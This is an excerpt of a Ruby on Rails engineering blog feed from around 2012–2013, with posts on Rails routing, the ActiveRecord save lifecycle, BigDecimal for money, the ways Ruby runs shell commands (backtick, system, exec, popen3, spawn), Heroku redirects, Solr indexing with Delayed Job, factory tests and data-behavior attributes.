}{ :path_info=&gt;&quot;/stories(.:format)&quot; }{ :path_info=&gt;&quot;/users(.:format), :request_method=&gt;[&quot;GET&quot;]}{:path_info=&gt;&quot;/users(.:format)&quot;, :request_method=&gt;[&quot;POST&quot;]}{:path_info=&gt;&quot;/users/new(.:format)&quot;, :request_method=&gt;[&quot;GET&quot;]}{:path_info=&gt;&quot;/users/:id/edit(.:format)&quot;, :request_method=&gt;[&quot;GET&quot;]}{:path_info=&gt;&quot;/users/:id(.:format)&quot;, :controller], :request_method=&gt;[&quot;GET&quot;]}{:path_info=&gt;&quot;/users/:id(.:format)&quot;, :request_method=&gt;[&quot;PATCH&quot;]}{:path_info=&gt;&quot;/users/:id(.:format)&quot;, :request_method=&gt;[&quot;PUT&quot;]}{:path_info=&gt;&quot;/users/:id(.:format)&quot;, :request_method=&gt;[&quot;DELETE&quot;]}</code></pre><h2>How to find the matching route definition</h2><p>So now that we have normalized the routing definitions the task at hand is tofind the right route definition for the given url along with request_method.</p><p>For example if the requested page is <code>/pictures/A12345</code> then the matchingrouting definition should be<code>get 'pictures/:id' =&gt; 'pictures#show', :constraints =&gt; { :id =&gt; /[A-Z]\d{5}/ }</code>.</p><p>In order to accomplish that I would do something like this.</p><p>I would convert all path info into a regular expression and I would push thatregular expression in an array. So in this case I would have 12 regularexpressions in the array and for the given url I would try to match one by one.</p><p>This strategy will work and this is how Rails worked all the way up to Rails 3.1.</p><h2>Aaron Patterson loves computer science</h2><p><a href="http://twitter.com/tenderlove">Aaron Patterson</a> noticed that finding the bestmatching route definition for a given url is nothing else but pattern matchingtask. And computer science solved this problem much more elegantly and thishappens to run faster also by building an AST and walking over it.</p><p>So he decided to make a mini language out of the route definitions . After allthe route definitions , we write , follow certain rules.</p><p>And thus <a href="http://github.com/rails/journey">Journey</a> was born.</p><p>In the next blog we will see how to write grammar rules for routing definitions, how to parse and then walk the ast to see the best match .</p>]]></content>
    </entry><entry>
       <title><![CDATA[Life of save in ActiveRecord]]></title>
       <author><name>Neeraj Singh</name></author>
      <link href="https://www.bigbinary.com/blog/live-of-save-in-activerecord"/>
      <updated>2013-01-15T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/live-of-save-in-activerecord</id>
      <content type="html"><![CDATA[<p><em>Following code was tested with edge rails (rails4) .</em></p><p>In a RubyonRails application we save records often. It is one of the most usedmethods in ActiveRecord. In the blog we are going to take a look at the lifecycle of save operation.</p><h2>ActiveRecord::Base</h2><p>A typical model looks like this.</p><pre><code class="language-ruby">class Article &lt; ActiveRecord::Baseend</code></pre><p>Now lets look at ActiveRecord::Base class in its entirety.</p><pre><code class="language-ruby">module ActiveRecord  class Base    extend ActiveModel::Naming    extend ActiveSupport::Benchmarkable    extend ActiveSupport::DescendantsTracker    extend ConnectionHandling    extend QueryCache::ClassMethods    extend Querying    extend Translation    extend DynamicMatchers    extend Explain    include Persistence    include ReadonlyAttributes    include ModelSchema    include Inheritance    include Scoping    include Sanitization    include AttributeAssignment    include ActiveModel::Conversion    include Integration    include Validations    include CounterCache    include Locking::Optimistic    include Locking::Pessimistic    include AttributeMethods    include Callbacks    include Timestamp    include Associations    include ActiveModel::SecurePassword    include AutosaveAssociation    include NestedAttributes    include Aggregations    include Transactions    include Reflection    include Serialization    include Store    include Core  end  ActiveSupport.run_load_hooks(:active_record, Base)end</code></pre><p><code>Base</code> class extends and includes a lot of modules. Here we are going to look atthe four modules that have method <code>def save</code> .</p><pre><code class="language-ruby">module ActiveRecord  class Base    ......................    include Persistence    .......................    include Validations    ........................    include AttributeMethods    ........................    include Transactions    ........................  endend</code></pre><h2>include Persistence</h2><p>Module <code>Persistence</code> defines <code>save</code> method like this</p><pre><code class="language-ruby">def save(*)  create_or_updaterescue ActiveRecord::RecordInvalid  falseend</code></pre><p>Now lets see method <code>create_or_update</code> .</p><pre><code class="language-ruby">def create_or_update  raise ReadOnlyRecord if readonly?  result = new_record? ? create_record : update_record  result != falseend</code></pre><p>So <code>save</code> method invokes <code>create_or_update</code> and <code>create_or_update</code> method eithercreates a record or updates a record. Dead simple.</p><h2>include Validations</h2><p>In module <code>Validations</code> the <code>save</code> method is defined as</p><pre><code class="language-ruby">def save(options={})  perform_validations(options) ? super : falseend</code></pre><p>In this case the <code>save</code> method simply invokes a call to <code>perform_validations</code> .</p><h2>include AttributeMethods</h2><p>Module <code>AttributeMethods</code> includes a bunch of modules like this</p><pre><code class="language-ruby">module ActiveRecord  module AttributeMethods    extend ActiveSupport::Concern    include ActiveModel::AttributeMethods    included do      include Read      include Write      include BeforeTypeCast      include Query      include PrimaryKey      include TimeZoneConversion      include Dirty      include Serialization    end</code></pre><p>Here we want to look at <code>Dirty</code> module which has <code>save</code> method defined asfollowing.</p><pre><code class="language-ruby">def save(*)  if status = super    @previously_changed = changes    @changed_attributes.clear  end  statusend</code></pre><p>Since this module is all about tracking if a record is dirty or not, the <code>save</code>method tracks the changed values.</p><h2>include Transactions</h2><p>In module <code>Transactions</code> the <code>save</code> method is defined as</p><pre><code class="language-ruby">def save(*) #:nodoc:  rollback_active_record_state! do    with_transaction_returning_status { super }  endend</code></pre><p>The method <code>rollback_active_record_state!</code> is defined as</p><pre><code class="language-ruby">def rollback_active_record_state!  remember_transaction_record_state  yieldrescue Exception  restore_transaction_record_state  raiseensure  clear_transaction_record_stateend</code></pre><p>And the method <code>with_transaction_returning_status</code> is defined as</p><pre><code class="language-ruby">def with_transaction_returning_status  status = nil  self.class.transaction do    add_to_transaction    begin      status = yield    rescue ActiveRecord::Rollback      @_start_transaction_state[:level] = (@_start_transaction_state[:level] || 0) - 1      status = nil    end    raise ActiveRecord::Rollback unless status  end  statusend</code></pre><p>Together methods <code>rollback_active_record_state!</code> and<code>with_transaction_returning_status</code> ensure that all the operations happeninginside <code>save</code> is happening in a single transaction.</p><h2>Why save method needs to be in a transaction .</h2><p>A model can define a number of callbacks including <code>after_save</code> and<code>before_save</code>. All those callbacks are operated within a transaction. It meansif an <code>after_save</code> callback operation raises an exception then the <code>save</code>operation is rolled back.</p><p>Not only that a number of associations like <code>has_many</code> and <code>belongs_to</code> usecallbacks to handle association manipulation. In order to ensure the integrityof the operation the save operation is wrapped in a transaction .</p><h2>reverse order of operation</h2><p>In the <code>Base</code> class the modules are included in the following order.</p><pre><code class="language-ruby">module ActiveRecord  class Base    ......................    include Persistence    .......................    include Validations    ........................    include AttributeMethods    ........................    include Transactions    ........................  endend</code></pre><p>All the four modules have <code>save</code> method. The way ruby works the last module tobe included gets to act of the method first. So the order in which <code>save</code> methodgets execute is <code>Transactions</code>, <code>AttributeMethods</code>, <code>Validations</code> and<code>Persistence</code> .</p><p>To get a visual feel, I added a <code>puts</code> inside each of the save methods. Here isthe result.</p><pre><code class="language-ruby">&gt; User.new.save1.9.1 :001 &gt; User.new.saveentering save in transactions   (0.1ms)  begin transactionentering save in attribute_methodsentering save in validationsentering save in persistence  SQL (47.3ms)  INSERT INTO &quot;users&quot; (&quot;created_at&quot;, &quot;updated_at&quot;) VALUES (?, ?)  [[&quot;created_at&quot;, Mon, 21 Jan 2013 14:56:52 UTC +00:00], [&quot;updated_at&quot;, Mon, 21 Jan 2013 14:56:52 UTC +00:00]]leaving save in persistenceleaving save in validationsleaving save in attribute_methods   (17.6ms)  rollback transactionleaving save in transactions =&gt; nil</code></pre><p>As you can see the order of operations is</p><pre><code class="language-ruby">entering save in transactionsentering save in attribute_methodsentering save in validationsentering save in persistenceleaving save in persistenceleaving save in validationsleaving save in attribute_methodsleaving save in transactions</code></pre>]]></content>
    </entry><entry>
       <title><![CDATA[Handling money in ruby]]></title>
       <author><name>Neeraj Singh</name></author>
      <link href="https://www.bigbinary.com/blog/handling-money-in-ruby"/>
      <updated>2013-01-14T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/handling-money-in-ruby</id>
      <content type="html"><![CDATA[<p>In ruby do not use float for calculation since float is not good for precisecalculation.</p><pre><code class="language-ruby">irb(main):001:0&gt; 200 * (7.0/100)=&gt; 14.000000000000002</code></pre><p>7 % of 200 should be 14. But float is returning <code>14.000000000000002</code> .</p><p>In order to ensure that calculation is right make sure that all the actorsparticipating in calculation is of class<a href="http://www.ruby-doc.org/stdlib-1.9.3/libdoc/bigdecimal/rdoc/BigDecimal.html">BigDecimal</a>. Here is how same operation can be performed using BigDecimal .</p><pre><code class="language-ruby">irb(main):003:0&gt; result = BigDecimal.new(200) * ( BigDecimal.new(7)/BigDecimal.new(100))=&gt; #&lt;BigDecimal:7fa5eefa1720,'0.14E2',9(36)&gt;irb(main):004:0&gt; result.to_s=&gt; &quot;14.0&quot;</code></pre><p>As we can see BigDecimal brings much more accurate result.</p><h2>Converting money to cents</h2><p>In order to charge the credit card using <a href="https://stripe.com/">Stripe</a> we neededto have the amount to be charged in cents. One way to convert the value in centswould be</p><pre><code class="language-ruby">amount  = BigDecimal.new(200) * ( BigDecimal.new(7)/BigDecimal.new(100))puts (amount * 100).to_i #=&gt; 1400</code></pre><p>Above method works but I like to delegate the functionality of making money outof a complex BigDecimal value to gem like<a href="https://rubygems.org/gems/money">money</a> . In this project we are using<a href="https://rubygems.org/gems/activemerchant">activemerchant</a> which depends onmoney gem . So we get money gem for free. You might have to add money gem toGemfile if you want to use following technique.</p><p>money gem lets you get a money instance out of BigDecimal.</p><pre><code class="language-ruby">amount  = BigDecimal.new(200) * ( BigDecimal.new(7)/BigDecimal.new(100))amount_in_money = amount.to_moneyputs amount_in_money.cents #=&gt; 1400</code></pre><h2>Stay in BigDecimal or money mode for calculation</h2><p>If you are doing any sort of calculation then all participating elements must beeither BigDecimal or Money instance. It is best if all the elements are of thesame type.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Executing shell commands in ruby]]></title>
       <author><name>Neeraj Singh</name></author>
      <link href="https://www.bigbinary.com/blog/backtick-system-exec-in-ruby"/>
      <updated>2012-10-18T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/backtick-system-exec-in-ruby</id>
      <content type="html"><![CDATA[<p>Ruby allows many different ways to execute a command or a sub-process. In thisarticle we are going to see some of them.</p><h2>backtick</h2><h4>1. Returns standard output</h4><p><a href="http://ruby-doc.org/core-1.9.3/Kernel.html#method-i-60">backtick</a> returns thestandard output(<code>stdout</code>) of the operation.</p><pre><code class="language-ruby">output = `pwd`puts &quot;output is #{output}&quot;</code></pre><pre><code class="language-ruby">$ ruby main.rboutput is /Users/neerajsingh/code/misc</code></pre><p>backtick does not capture <code>STDERR</code> . If you want to learn about <code>STDERR</code> thencheckout this<a href="https://www.howtogeek.com/435903/what-are-stdin-stdout-and-stderr-on-linux/">excellent article</a>.</p><p>You can redirect <code>STDERR</code> to <code>STDOUT</code> if you want to capture <code>STDERR</code> usingbacktick.</p><pre><code class="language-ruby">output = `grep hosts /private/etc/* 2&gt;&amp;1`</code></pre><h4>2. Exception is passed on to the main program</h4><p>Backtick operation forks the master process and the operation is executed in anew process. If there is an exception in the sub-process then that exception isgiven to the main process and the main process might terminate if exception isnot handled.</p><p>In the following case I am executing <code>xxxxx</code> which is not a valid executablename.</p><pre><code class="language-ruby">output = `xxxxxxx`puts &quot;output is #{output}&quot;</code></pre><p>Result of above code is given below. Notice that <code>puts</code> was never executedbecause the backtick operation raised exception.</p><pre><code class="language-ruby">$ ruby main.rbmain.rb:1:in ``': No such file or directory - xxxxxxx (Errno::ENOENT)from main.rb:1:in `&lt;main&gt;'</code></pre><h4>3. Blocking operation</h4><p>Backtick is a blocking operation. The main application waits until the result ofbacktick operation completes.</p><h4>4. Checking the status of the operation</h4><p>To check the status of the backtick operation you can execute <code>$?.success?</code></p><pre><code class="language-ruby">output = `ls`puts &quot;output is #{output}&quot;puts $?.success?</code></pre><p>Notice that the last line of the result contains <code>true</code> because the backtickoperation was a success.</p><pre><code class="language-ruby">$ ruby main.rboutput is lab.rbmain.rbtrue</code></pre><h4>5. String interpolation is allowed within the ticks</h4><pre><code class="language-ruby">cmd = 'ls'`#{cmd}`</code></pre><h4>6. Different delimiter and string interpolation</h4><p><code>%x</code> does the same thing as backtick. It allows you to have different delimiter.</p><pre><code class="language-ruby">output = %x[ ls ]output = %x{ ls }</code></pre><p>backtick runs the command in subshell. So shell features like stringinterpolation and wild card can be used. Here is an example.</p><pre><code class="language-ruby">$ irb&gt; dir = '/etc'&gt; %x&lt;ls -al #{dir}&gt;=&gt; &quot;lrwxr-xr-x@ 1 root  wheel  11 Jan  5 21:10 /etc -&gt; private/etc&quot;</code></pre><p>If you are building a script which you mean to run on your laptops and not onserver then most likely if there is an exception then you want the script toabort. For such cases <code>backtick</code> is the best choice.</p><p>For example let's say that I want to write a script to make my repo up-to-dateautomatically. The command would be something like this.</p><pre><code>cd directory_name &amp;&amp; git checkout main &amp;&amp; git pull origin main</code></pre><p>If there is any error while executing this command then you want to have thefull access to the exception so that you could debug. In such cases the best wayto execute this command is as shown below.</p><pre><code>cmd = &quot;cd #{directory_name} &amp;&amp; git checkout main &amp;&amp; git pull origin main&quot;%x[ cmd ]</code></pre><h2>system</h2><p>The <a href="http://ruby-doc.org/core-1.9.3/Kernel.html#M005971">system</a> command runs ina subshell.</p><p>Just like <code>backtick</code>, <code>system</code> is a blocking operation.</p><p>Since <code>system</code> command runs in a subshell it eats up all the exceptions. So themain operation never needs to worry about capturing an exception raised from thechild process.</p><pre><code class="language-ruby">output = system('xxxxxxx')puts &quot;output is #{output}&quot;</code></pre><p>Result of the above operation is given below. Notice that even when exception israised the main program completes and the output is printed. The value of outputis nil because the child process raised an exception.</p><pre><code class="language-plaintext">$ ruby main.rboutput is</code></pre><p><code>system</code> returns <code>true</code> if the command was successfully performed ( exit statuszero ) . It returns <code>false</code> for non zero exit status. It returns <code>nil</code> ifcommand execution fails.</p><pre><code class="language-ruby">system(&quot;command that does not exist&quot;)  #=&gt; nilsystem(&quot;ls&quot;)                           #=&gt; truesystem(&quot;ls | grep foo&quot;)                #=&gt; false</code></pre><p><code>system</code> sets the global variable $? to the exit status of the process. Rememberthat a value of zero means the operation was a success.</p><p>The biggest issue with <code>system</code> command is that it's not possible to capture theoutput of the operation.</p><h2>exec</h2><p><a href="http://ruby-doc.org/core-1.9.3/Kernel.html#method-i-exec">Kernel#exec</a> replacesthe current process by running the external command.</p><p>Let's see an example. Here I am in irb and I am going to execute <code>exec('ls')</code>.</p><pre><code class="language-plaintext">$ irbe1.9.3-p194 :001 &gt; exec('ls')lab.rb  main.rbnsingh ~/neerajsingh$</code></pre><p>I see the result but since the irb process was replaced by the <code>exec</code> process Iam no longer in <code>irb</code> .</p><p>Behind the scene both <code>system</code> and <code>backtick</code> operations use <code>fork</code> to fork thecurrent process and then they execute the given operation using <code>exec</code> .</p><p>Since <code>exec</code> replaces the current process it does not return anything. It printsthe output on the screen. There is no way to know if the operation was a&quot;success&quot; or a &quot;failure&quot; and hence it's not recommended to use <code>exec</code>.</p><h2>sh</h2><p><a href="http://rake.rubyforge.org/classes/FileUtils.html">sh</a> actually calls <code>system</code>under the hood. However it is worth a mention here. This method is added by<code>FileUtils</code> in <code>rake</code>. It allows an easy way to check the exit status of thecommand.</p><pre><code class="language-ruby">require 'rake'sh %w(xxxxx) do |ok, res|   if !ok     abort 'the operation failed'   endend</code></pre><h2>popen3</h2><p>If you are going to capture <code>stdout</code> and <code>stderr</code> then you should use<a href="http://www.ruby-doc.org/stdlib-1.9.3/libdoc/open3/rdoc/Open3.html#method-c-popen3">popen3</a>since this method allows you to interact with <code>stdin</code>, <code>stdout</code> and <code>stderr</code> .</p><p>I want to execute <code>git push heroku master</code> programmatically and I want tocapture the output. Here is my code.</p><pre><code class="language-ruby">require 'open3'cmd = 'git push heroku master'Open3.popen3(cmd) do |stdin, stdout, stderr, wait_thr|  puts &quot;stdout is:&quot; + stdout.read  puts &quot;stderr is:&quot; + stderr.readend</code></pre><p>And here is the output. It has been truncated since rest of output is notrelevant to this discussion.</p><pre><code class="language-plaintext">stdout is:stderr is:-----&gt; Heroku receiving push-----&gt; Ruby/Rails app detected-----&gt; Installing dependencies using Bundler version 1.2.1</code></pre><p>The important thing to note here is that when I execute the program<code>ruby lab.rb</code> I do not see any output on my terminal for first 10 seconds. ThenI see the whole output as one single dump.</p><p>The other thing to note is that heroku is writing all this output to <code>stderr</code>and not to <code>stdout</code> .</p><p>Above solution works but it has one major drawback. The push to heroku mighttake 10 to 20 seconds and for this period we do not get any feedback on theterminal. In reality when we execute <code>git push heroku master</code> we start seeingresult on our terminal one by one as heroku is processing things.</p><p>So we should capture the output from heroku as it is being streamed rather thandumping the whole output as one single chunk of string at the end of processing.</p><p>Here is the modified code.</p><pre><code class="language-ruby">require 'open3'cmd = 'git push heroku master'Open3.popen3(cmd) do |stdin, stdout, stderr, wait_thr|  while line = stderr.gets    puts line  endend</code></pre><p>Now when I execute above command using <code>ruby lab.rb</code> I get the output on myterminal incrementally as if I had typed <code>git push heroku master</code> .</p><p>Here is another example of capturing streaming output.</p><pre><code class="language-ruby">require 'open3'cmd = 'ping www.google.com'Open3.popen3(cmd) do |stdin, stdout, stderr, wait_thr|  while line = stdout.gets    puts line  endend</code></pre><p>In the above case you will get the output of ping on your terminal as if you hadtyped <code>ping www.google.com</code> on your terminal .</p><p>Now let's see how to check if command succeeded or not.</p><pre><code class="language-ruby">require 'open3'cmd = 'ping www.google.com'Open3.popen3(cmd) do |stdin, stdout, stderr, wait_thr|  exit_status = wait_thr.value  unless exit_status.success?    abort &quot;FAILED !!! #{cmd}&quot;  endend</code></pre><h2>popen2e</h2><p><a href="http://www.ruby-doc.org/stdlib-1.9.3/libdoc/open3/rdoc/Open3.html#method-c-popen2e">popen2e</a>is similar to popen3 but merges the standard output and standard error .</p><pre><code class="language-ruby">require 'open3'cmd = 'ping www.google.com'Open3.popen2e(cmd) do |stdin, stdout_err, wait_thr|  while line = stdout_err.gets    puts line  end  exit_status = wait_thr.value  unless exit_status.success?    abort &quot;FAILED !!! #{cmd}&quot;  endend</code></pre><p>In all other areas this method works similar to <code>popen3</code> .</p><h2>Process.spawn</h2><p><a href="http://www.ruby-doc.org/core-1.9.3/Process.html#method-c-spawn">Kernel.spawn</a>executes the given command in a subshell. It returns immediately with theprocess id.</p><pre><code class="language-ruby">irb(main)&gt; pid = Process.spawn(&quot;ls -al&quot;)=&gt; 81001</code></pre>]]></content>
    </entry><entry>
       <title><![CDATA[Redirect to www for heroku with SSL]]></title>
       <author><name>Neeraj Singh</name></author>
      <link href="https://www.bigbinary.com/blog/redirect-to-www-heroku-ssl"/>
      <updated>2012-10-12T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/redirect-to-www-heroku-ssl</id>
      <content type="html"><![CDATA[<p>If you are using heroku and if you have enabled https then site must beredirected to use <code>www</code> . It means all Rails applications should ensure that&quot;no-www&quot; urls are redirected to &quot;www&quot;.</p><p>In Rails3 it is pretty easy to do. Here is how it can be done.</p><pre><code class="language-ruby">Bigbinary::Application.routes.draw do  constraints(:host =&gt; /^bigbinary.com/) do    root :to =&gt; redirect(&quot;http://www.bigbinary.com&quot;)    match '/*path', :to =&gt; redirect {|params| &quot;http://www.bigbinary.com/#{params[:path]}&quot;}  endend</code></pre>]]></content>
    </entry><entry>
       <title><![CDATA[Solr, Sunspot, Websolr and Delayed job]]></title>
       <author><name>Neeraj Singh</name></author>
      <link href="https://www.bigbinary.com/blog/solr-sunspot-websolr-delayed-job"/>
      <updated>2012-10-11T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/solr-sunspot-websolr-delayed-job</id>
      <content type="html"><![CDATA[<p><a href="http://lucene.apache.org/solr/">Solr</a> is an open source search platform fromApache. It has a very powerful full-text search capability among other things.</p><p>Solr is written in Java. And it runs as a standalone search server within aservlet container like Tomcat. When you are working on a Ruby on Railsapplication you do not want to maintain Tomcat server. This is where<a href="https://websolr.com">websolr</a> comes in picture. Websolr manages the index andthe Rails application interacts with index using a gem called<a href="https://github.com/outoftime/sunspot_rails">sunspot-rails</a> .</p><h2>Getting started</h2><pre><code class="language-ruby"># Gemfilegem 'sunspot_rails', '= 1.3.3' # search feature</code></pre><p>Here I am interested in searching products.</p><pre><code class="language-ruby">class Product &lt; ActiveRecord::Base  searchable do    text :name, boost: 1.5    text :description  endend</code></pre><h2>Using sunspot gem</h2><pre><code class="language-ruby">rails g sunspot_rails:install</code></pre><p>Above command creates <code>config/sunspot.yml</code> file. By default this file looks likefollowing.</p><pre><code class="language-ruby">production:  solr:    hostname: localhost    port: 8983    log_level: WARNINGdevelopment:  solr:    hostname: localhost    port: 8982    log_level: INFOtest:  solr:    hostname: localhost    port: 8981    log_level: WARNING</code></pre><p>The way sunspot works is that after every single web request it updates solrabout the changes that took place in the request. This is not desirable. To turnthat off add <code>auto_commit_after_request</code> option to false in the<code>config/sunsunspot.yml</code> file.</p><p>I would also change the <code>log_level</code> for development to <code>DEBUG</code> . The revised<code>config/sunspot.yml</code> file would look like</p><pre><code class="language-ruby">production:  solr:    hostname: localhost    port: 8983    log_level: WARNING    auto_commit_after_request: falsedevelopment:  solr:    hostname: localhost    port: 8980    log_level: DEBUG    auto_commit_after_request: falsetest:  solr:    hostname: localhost    port: 8981    log_level: DEBUG    auto_commit_after_request: false</code></pre><h2>Taking care of callbacks</h2><p>In the above case anytime I create, update or destroy a product then as part of<code>after_save</code> callback solr commit commands are issued. Since <code>after_save</code>callbacks are part of ActiveRecord transaction, this slows up the create, updateand destroy operation. I like all these operations to happen in background.</p><p>Here is how I handled it</p><pre><code class="language-ruby">class Product &lt; ActiveRecord::Base  searchable do    text :name, boost: 1.5    text :description  end  handle_asynchronously :solr_index, queue: 'indexing', priority: 50  handle_asynchronously :solr_index!, queue: 'indexing', priority: 50  handle_asynchronously :remove_from_index, queue: 'indexing', priority: 50end</code></pre><p>In the above case I used<a href="https://github.com/collectiveidea/delayed_job">Delayed Job</a> but you can use anybackground job processing tool.</p><p>In case of Delayed Job the higher the priority value the less is the priority.By bumping the priority value to 50, I'm making sure that emails and otherbackground jobs are processed before solr work is taken up.</p><h2>Problem with <code>remove_from_index</code></h2><p>In the above case the call to <code>remove_from_index</code> has been deferred to DelayedJob. However the record has already been destroyed. So when Delayed Job takes upthe work it first tries to retrieve the record. However the record is missingand the background job fails.</p><p>Here is how we solved this problem.</p><pre><code class="language-ruby">class Product &lt; ActiveRecord::Base  searchable do    text :name, boost: 1.5    text :description  end  handle_asynchronously :solr_index, queue: 'indexing', priority: 50  handle_asynchronously :solr_index!, queue: 'indexing', priority: 50  def remove_from_index_with_delayed    Delayed::Job.enqueue RemoveIndexJob.new(record_class: self.class.to_s, attributes: self.attributes), queue: 'indexing', priority: 50  end  alias_method_chain :remove_from_index, :delayedend</code></pre><p>Add another worker named <code>remove_index.rb</code> .</p><pre><code class="language-ruby">class RemoveIndexJob &lt; Struct.new(:options)  def perform    return if options.nil?    options.symbolize_keys!    record = options[:record_class].constantize.new options[:attributes].except(&quot;id&quot;)    record.id = options[:attributes][&quot;id&quot;]    record.remove_from_index_without_delayed  endend</code></pre><h2>Connecting to websolr</h2><p>From the websolr documentation it was not clear that the sunspot gem first looksfor an environment variable called <code>WEBSOLR_URL</code> and if that environmentvariable has a value then sunspot assumes that the solr index is at that url. Ifno value is found then it assumes that it is dealing with local solr instance.</p><p>So if you are using websolr then make sure that your application has environmentvariable <code>WEBSOLR_URL</code> properly configured in staging and in productionenvironment.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Test factories first]]></title>
       <author><name>Neeraj Singh</name></author>
      <link href="https://www.bigbinary.com/blog/test-factories-first"/>
      <updated>2012-10-10T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/test-factories-first</id>
      <content type="html"><![CDATA[<p>In<a href="http://robots.thoughtbot.com/post/30994874643/testing-your-factories-first">blog</a>thoughtbot team outlined how they test their factories first. I like thisapproach. Since we prefer using minitest here is how we implemented it. It issimilar to how the thoughtbot blog has described. However I still want to blogabout it so that in our other projects we can use similar approach.</p><p>First under <code>spec</code> directory create a file called <code>factories_spec.rb</code> . Here ishow our file looks.</p><pre><code class="language-ruby">require File.expand_path(File.dirname(__FILE__) + '/spec_helper')describe FactoryGirl do  EXCEPTIONS = %w(base_address base_batch bad_shipping_address shipping_method_rate bad_billing_address)  FactoryGirl.factories.each do |factory|    next if EXCEPTIONS.include?(factory.name.to_s)    describe &quot;The #{factory.name} factory&quot; do      it 'is valid' do        instance = build(factory.name)        instance.must_be :valid?      end    end  endend</code></pre><p>Next I need to tell rake to always run this test file first.</p><p>When rake command is executed then it goes through all the <code>.rake</code> and loadsthem. So all we need to do is to create a rake file called <code>factory.rake</code> andput this file under <code>lib/tasks</code> .</p><pre><code class="language-ruby">desc 'Run factory specs.'Rake::TestTask.new(:factory_specs) do |t|  t.pattern = './spec/factories_spec.rb'endtask test: :factory_specs</code></pre><p>Here a dependency is being added to <code>test</code> . And if factory test fails thendependency is not met and the main test suite will not run.</p><p>That's it. Now each unit test does not need to test factory first. All factoriesare getting tested here.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Data-behavior is for JavaScript developers]]></title>
       <author><name>Neeraj Singh</name></author>
      <link href="https://www.bigbinary.com/blog/data-behavior"/>
      <updated>2012-10-10T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/data-behavior</id>
      <content type="html"><![CDATA[<p>I have written a lot of JavaScript code like this</p><pre><code class="language-javascript">$(&quot;.product_pictures .actions .delete&quot;).on &quot;click&quot;, -&gt;  do_something_useful</code></pre><p>The problem with above code is that class names in the html markup was meant forweb design. By using css class for functional work, I have made both the designteam and the front end development team perpetually terrified of making anychange.</p><h2>Class is meant for CSS</h2><p>If designer wants to change markup from</p><pre><code class="language-html">&lt;div class=&quot;first actions&quot;&gt;  xxx  &lt;div&gt;&lt;/div&gt;&lt;/div&gt;</code></pre><p>to</p><pre><code class="language-html">&lt;div class=&quot;first actions-items&quot;&gt;  xxx  &lt;div&gt;&lt;/div&gt;&lt;/div&gt;</code></pre><p>they are not too sure what JavaScript code might break. So they work around it.</p><p>Same goes for JavaScript developers. They do not want to unintentionally removea class element otherwise the web design might get messed up.</p><p>There has to be a better way which clearly separates the design elements fromthe functional elements.</p><h2>data-behavior to the rescue</h2><p><a href="https://twitter.com/qrush">Nick Quaranto</a> of 37Signals presented<a href="http://37signals.com/svn/posts/3167-code-spelunking-in-the-all-new-basecamp">Code spelunking in the All New Basecamp</a>in <a href="http://www.youtube.com/watch?v=oXTzFCXE66M">video</a>.</p><p>In his presentation he mentioned <code>data-behavior</code> .</p><p><code>data-behavior</code> usage can be best understood by an example.</p><pre><code class="language-javascript"># no data-behavior$(&quot;.product_pictures .actions .delete&quot;).on(&quot;click&quot;, function(){});</code></pre><pre><code class="language-javascript"># code with data-behavior$('[data-behavior~=delete-product-picture]').on('click', function(){});# Another style with the same effect$(document).on('click',&quot;[data-behavior~=delete-product-picture]&quot;,  function(){ });</code></pre><p>The html markup will change from</p><pre><code class="language-ruby"> &lt;%= link_to '#', class: 'delete', &quot;data-action-id&quot; =&gt; picture.id do %&gt;</code></pre><p>to</p><pre><code class="language-ruby">&lt;%= link_to '#', class: 'delete', &quot;data-action-id&quot; =&gt; picture.id, 'data-behavior' =&gt; 'delete-product-picture' do %&gt;</code></pre><p>Above code would produce html looking something like this</p><pre><code class="language-html">&lt;a  class=&quot;delete&quot;  data-action-id=&quot;&quot;  data-behavior=&quot;delete-product-picture&quot;  href=&quot;#&quot;&gt;  &lt;button&gt;Delete&lt;/button&gt;&lt;/a&gt;</code></pre><p>Now in the above case the designer can change the css class as desired and itwill have no impact on JavaScript functionality.</p><h2>More usage of data-behavior</h2><p>Based on this data-behavior approach I changed some part of a project I wasworking on to use data-behavior.</p><p><code>data-behavior</code> is a very simple and effective tool to combat the problem ofhaving clear separation between designer elements and JavaScription functionalwork.</p><h2>Code snippet for reference</h2><p>Over the period of time we have used this technique in many projectssuccessfully. However sometimes I need to spend a while to find the right way toadd <code>data-behavior</code>. I'm adding some code snippet so that I can find them herewhen I need them.</p><pre><code class="language-ruby">%div{ class: &quot;&quot;, &quot;data-behavior&quot; =&gt; &quot;search-container&quot; }.div{ data: { behavior: 'search-container' }, style: &quot;&quot; }= button_tag '', :class =&gt; &quot;&quot;, &quot;data-behavior&quot; =&gt; &quot;search-container&quot;= link_to 'Edit', &quot;#&quot;,                  data:{ behavior: 'display-in-modal', url: '' },                  class: &quot;&quot;= f.check_box :include_annual_workplan,              'data-behavior' =&gt; 'input-include-workplan'= f.text_area :content, placeholder: &quot;&quot;,                        class: '',                        data: { behavior: &quot;comment-content&quot; }= f.text_field :name, class: '',                      'data-behavior' =&gt; 'input-client-name'= form_for '', data: { remote: true, behavior: 'add-comment-form' } do |f|</code></pre>]]></content>
    </entry><entry>
       <title><![CDATA[emberjs mixin]]></title>
       <author><name>Neeraj Singh</name></author>
      <link href="https://www.bigbinary.com/blog/emberjs-mixin"/>
      <updated>2012-08-27T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/emberjs-mixin</id>
